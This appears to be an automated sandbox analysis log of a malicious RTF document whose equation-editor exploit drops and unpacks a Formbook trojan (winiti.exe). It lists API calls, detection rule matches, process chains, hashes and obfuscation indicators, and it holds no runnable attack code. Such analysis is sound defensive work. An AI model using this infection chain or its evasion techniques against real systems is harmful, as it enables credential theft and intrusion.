Source: C:\Users\user\AppData\Roaming\winiti.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_0042BEE3 NtClose, 6_2_0042BEE3
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D807AC NtCreateMutant,LdrInitializeThunk, 6_2_00D807AC
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7F9F0 NtClose,LdrInitializeThunk, 6_2_00D7F9F0
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FAE8 NtQueryInformationProcess,LdrInitializeThunk, 6_2_00D7FAE8
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FB68 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_00D7FB68
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FDC0 NtQuerySystemInformation,LdrInitializeThunk, 6_2_00D7FDC0
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D800C4 NtCreateFile, 6_2_00D800C4
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D80048 NtProtectVirtualMemory, 6_2_00D80048
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D80078 NtResumeThread, 6_2_00D80078
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D80060 NtQuerySection, 6_2_00D80060
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D801D4 NtSetValueKey, 6_2_00D801D4
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D8010C NtOpenDirectoryObject, 6_2_00D8010C
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D80C40 NtGetContextThread, 6_2_00D80C40
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D810D0 NtOpenProcessToken, 6_2_00D810D0
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D81148 NtOpenThread, 6_2_00D81148
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7F8CC NtWaitForSingleObject, 6_2_00D7F8CC
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7F900 NtReadFile, 6_2_00D7F900
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D81930 NtSetContextThread, 6_2_00D81930
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7F938 NtWriteFile, 6_2_00D7F938
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FAD0 NtAllocateVirtualMemory, 6_2_00D7FAD0
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FAB8 NtQueryValueKey, 6_2_00D7FAB8
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FA50 NtEnumerateValueKey, 6_2_00D7FA50
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FA20 NtQueryInformationFile, 6_2_00D7FA20
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FBE8 NtQueryVirtualMemory, 6_2_00D7FBE8
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FBB8 NtQueryInformationToken, 6_2_00D7FBB8
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FB50 NtCreateKey, 6_2_00D7FB50
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FC90 NtUnmapViewOfSection, 6_2_00D7FC90
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FC48 NtSetInformationFile, 6_2_00D7FC48
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FC60 NtMapViewOfSection, 6_2_00D7FC60
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FC30 NtOpenProcess, 6_2_00D7FC30
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D81D80 NtSuspendThread, 6_2_00D81D80
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FD8C NtDelayExecution, 6_2_00D7FD8C
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FD5C NtEnumerateKey, 6_2_00D7FD5C
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FED0 NtAdjustPrivilegesToken, 6_2_00D7FED0
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FEA0 NtReadVirtualMemory, 6_2_00D7FEA0
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FE24 NtWriteVirtualMemory, 6_2_00D7FE24
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FFFC NtCreateProcessEx, 6_2_00D7FFFC
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FFB4 NtCreateSection, 6_2_00D7FFB4
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FF34 NtQueueApcThread, 6_2_00D7FF34
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 5_2_00183D98 5_2_00183D98
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 5_2_00183B38 5_2_00183B38
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 5_2_005919C0 5_2_005919C0
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 5_2_00591DE8 5_2_00591DE8
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 5_2_005919B1 5_2_005919B1
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 5_2_00592230 5_2_00592230
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 5_2_00592220 5_2_00592220
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 5_2_00592B50 5_2_00592B50
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 5_2_00592718 5_2_00592718
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 5_2_00592709 5_2_00592709
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 5_2_00181169 5_2_00181169
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 5_2_001804C8 5_2_001804C8
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00401420 6_2_00401420
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00401000 6_2_00401000
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00401154 6_2_00401154
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00401160 6_2_00401160
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00416A4E 6_2_00416A4E
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00416A53 6_2_00416A53
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_0040FCCB 6_2_0040FCCB
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_0040FCD3 6_2_0040FCD3
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_0042E523 6_2_0042E523
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_0040FEF3 6_2_0040FEF3
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_0040DF73 6_2_0040DF73
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00402FD0 6_2_00402FD0
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D8E0C6 6_2_00D8E0C6
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D8E2E9 6_2_00D8E2E9
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DB63DB 6_2_00DB63DB
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E363BF 6_2_00E363BF
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DDA37B 6_2_00DDA37B
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D92305 6_2_00D92305
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E1443E 6_2_00E1443E
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E105E3 6_2_00E105E3
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DAC5F0 6_2_00DAC5F0
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DD6540 6_2_00DD6540
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D9E6C1 6_2_00D9E6C1
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D94680 6_2_00D94680
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E32622 6_2_00E32622
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DDA634 6_2_00DDA634
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D9C7BC 6_2_00D9C7BC
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D9C85C 6_2_00D9C85C
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DB286D 6_2_00DB286D
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E249F5 6_2_00E249F5
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DA69FE 6_2_00DA69FE
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D929B2 6_2_00D929B2
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E3098E 6_2_00E3098E
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DDC920 6_2_00DDC920
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E16BCB 6_2_00E16BCB
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E3CBA4 6_2_00E3CBA4
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E32C9C 6_2_00E32C9C
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E1AC5E 6_2_00E1AC5E
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D9CD5B 6_2_00D9CD5B
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DC0D3B 6_2_00DC0D3B
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DAEE4C 6_2_00DAEE4C
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DC2E2F 6_2_00DC2E2F
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E02FDC 6_2_00E02FDC
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E2CFB1 6_2_00E2CFB1
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DA0F3F 6_2_00DA0F3F
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DA905A 6_2_00DA905A
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E0D06D 6_2_00E0D06D
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D93040 6_2_00D93040
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DBD005 6_2_00DBD005
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E1D13F 6_2_00E1D13F
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E31238 6_2_00E31238
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D8F3CF 6_2_00D8F3CF
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D97353 6_2_00D97353
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DA1489 6_2_00DA1489
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DC5485 6_2_00DC5485
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DCD47D 6_2_00DCD47D
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E335DA 6_2_00E335DA
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D9351F 6_2_00D9351F
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DC57C3 6_2_00DC57C3
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E1579A 6_2_00E1579A
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E2771D 6_2_00E2771D
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E2F8EE 6_2_00E2F8EE
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E0F8C4 6_2_00E0F8C4
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E1394B 6_2_00E1394B
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E15955 6_2_00E15955
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E43A83 6_2_00E43A83
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D8FBD7 6_2_00D8FBD7
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E1DBDA 6_2_00E1DBDA
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DB7B00 6_2_00DB7B00
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E2FDDD 6_2_00E2FDDD
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DBDF7C 6_2_00DBDF7C
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E1BF14 6_2_00E1BF14
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exe 434EC59B680788BAE7F2935200A77E681CECBB517D853C6E6CF31F4CF112E5CC
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\winiti.exe 434EC59B680788BAE7F2935200A77E681CECBB517D853C6E6CF31F4CF112E5CC
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: String function: 00DD3F92 appears 132 times
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: String function: 00DD373B appears 253 times
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: String function: 00DFF970 appears 84 times
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: String function: 00D8E2A8 appears 60 times
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: String function: 00D8DF5C appears 137 times
Source: DzokrPQPdy.rtf, type: SAMPLE Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: 6.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 6.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.453259452.0000000000140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.453324257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: winiti[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: winiti.exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 5.2.winiti.exe.253505c.3.raw.unpack, VU5FiiciHrPuThVwBQ.cs Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.winiti.exe.240000.0.raw.unpack, VU5FiiciHrPuThVwBQ.cs Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, zDIByBvZeeoTUlBtuI.cs Security API names: _0020.SetAccessControl
Source: 5.2.winiti.exe.5150000.4.raw.unpack, zDIByBvZeeoTUlBtuI.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.winiti.exe.5150000.4.raw.unpack, zDIByBvZeeoTUlBtuI.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 5.2.winiti.exe.5150000.4.raw.unpack, hNFj00Hv45CTOkfqEI.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.expl.evad.winRTF@7/9@0/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$okrPQPdy.rtf
Source: C:\Users\user\AppData\Roaming\winiti.exe Mutant created: NULL
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVR7A4D.tmp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
Source: C:\Users\user\AppData\Roaming\winiti.exe Process created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64cpu.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: cryptsp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rpcrtremote.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dwmapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: version.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: secur32.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winhttp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: webio.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: iphlpapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winnsi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dnsapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: nlaapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc6.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rasadhlp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: propsys.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: ntmarta.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\winiti.exe Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\winiti.exe Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\winiti.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\winiti.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\winiti.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\winiti.exe Section loaded: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\winiti.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\winiti.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Roaming\winiti.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\winiti.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\winiti.exe Section loaded: rpcrtremote.dll
Source: DzokrPQPdy.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\DzokrPQPdy.rtf
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\winiti.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: amWV.pdb source: EQNEDT32.EXE, 00000002.00000002.359904925.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, winiti.exe, 00000005.00000000.359489635.0000000000C72000.00000020.00000001.01000000.00000005.sdmp, winiti.exe.2.dr, winiti[1].exe.2.dr
Source: Binary string: amWV.pdbSHA256 source: winiti.exe, 00000005.00000000.359489635.0000000000C72000.00000020.00000001.01000000.00000005.sdmp, winiti.exe.2.dr, winiti[1].exe.2.dr
Source: Binary string: wntdll.pdb source: winiti.exe, winiti.exe, 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: amWV.pdbSHA256H! source: EQNEDT32.EXE, 00000002.00000002.359904925.00000000006D4000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: 5.2.winiti.exe.253505c.3.raw.unpack, VU5FiiciHrPuThVwBQ.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 5.2.winiti.exe.240000.0.raw.unpack, VU5FiiciHrPuThVwBQ.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: winiti[1].exe.2.dr, Form1.cs .Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: winiti.exe.2.dr, Form1.cs .Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 5.2.winiti.exe.5150000.4.raw.unpack, zDIByBvZeeoTUlBtuI.cs .Net Code: snOBZDsoZ8 System.Reflection.Assembly.Load(byte[])
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00668F54 push eax; retf 2_2_00668F61
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0065F82A pushad ; iretd 2_2_0065F842
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0066871A push ds; retf 0007h 2_2_0066871C
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_006652EA push ecx; retf 0007h 2_2_006652EC
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_006601F4 push eax; retf 2_2_006601F5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0066C6DA push ds; retf 2_2_0066C6DC
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_006724AA push es; retf 2_2_006724AC
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00401420 push es; retn 00F1h 6_2_004014F8
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_0041F0DC push es; retf 6_2_0041F0E6
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00412104 pushad ; ret 6_2_0041212D
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_0040C1EA push edx; retf 6_2_0040C1EE
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00403260 push eax; ret 6_2_00403262
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00426263 push edi; iretd 6_2_0042626E
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00408271 push es; ret 6_2_00408272
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00413A0B push esi; retf 6_2_00413A0E
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00418A13 push ds; retf 2ECDh 6_2_00418BEE
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00418355 push ebp; retf 6_2_004183DC
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00418BA5 push ebx; iretd 6_2_00418BA6
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_0041E653 push ds; iretd 6_2_0041E654
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_0041E63B push ebx; iretd 6_2_0041E64C
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_004187CA push ebp; ret 6_2_004187CB
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D8DFA1 push ecx; ret 6_2_00D8DFB4
Source: winiti[1].exe.2.dr Static PE information: section name: .text entropy: 7.760978166314589
Source: winiti.exe.2.dr Static PE information: section name: .text entropy: 7.760978166314589
Source: 5.2.winiti.exe.253505c.3.raw.unpack, VU5FiiciHrPuThVwBQ.cs High entropy of concatenated method names: 'fgoCtXMiTS', 'RgtTUJcyZL', 'g6aXCYEDSs', 'eQtXXHpHK1', 'kgQXo5WvMo', 'rl7XDVFHmZ', 'WdR9wPuHuepeI', 'q3Of0ljuF', 'dAnWKSXiW', 'NMlgX8j6G'
Source: 5.2.winiti.exe.253505c.3.raw.unpack, cw37txoRO4X56hm21l.cs High entropy of concatenated method names: 'X1lG3WCB9', 'Qh3mYfMwF', 'zninSfm9E', 'MDb9Ewmta', 'dHqv0oE1o', 'MvWcl4qrS', 'MXJ1VCDef', 'amJ6pCGsS', 'Iynw5Xgff', 'D1JUO7GYj'
Source: 5.2.winiti.exe.240000.0.raw.unpack, VU5FiiciHrPuThVwBQ.cs High entropy of concatenated method names: 'fgoCtXMiTS', 'RgtTUJcyZL', 'g6aXCYEDSs', 'eQtXXHpHK1', 'kgQXo5WvMo', 'rl7XDVFHmZ', 'WdR9wPuHuepeI', 'q3Of0ljuF', 'dAnWKSXiW', 'NMlgX8j6G'
Source: 5.2.winiti.exe.240000.0.raw.unpack, cw37txoRO4X56hm21l.cs High entropy of concatenated method names: 'X1lG3WCB9', 'Qh3mYfMwF', 'zninSfm9E', 'MDb9Ewmta', 'dHqv0oE1o', 'MvWcl4qrS', 'MXJ1VCDef', 'amJ6pCGsS', 'Iynw5Xgff', 'D1JUO7GYj'
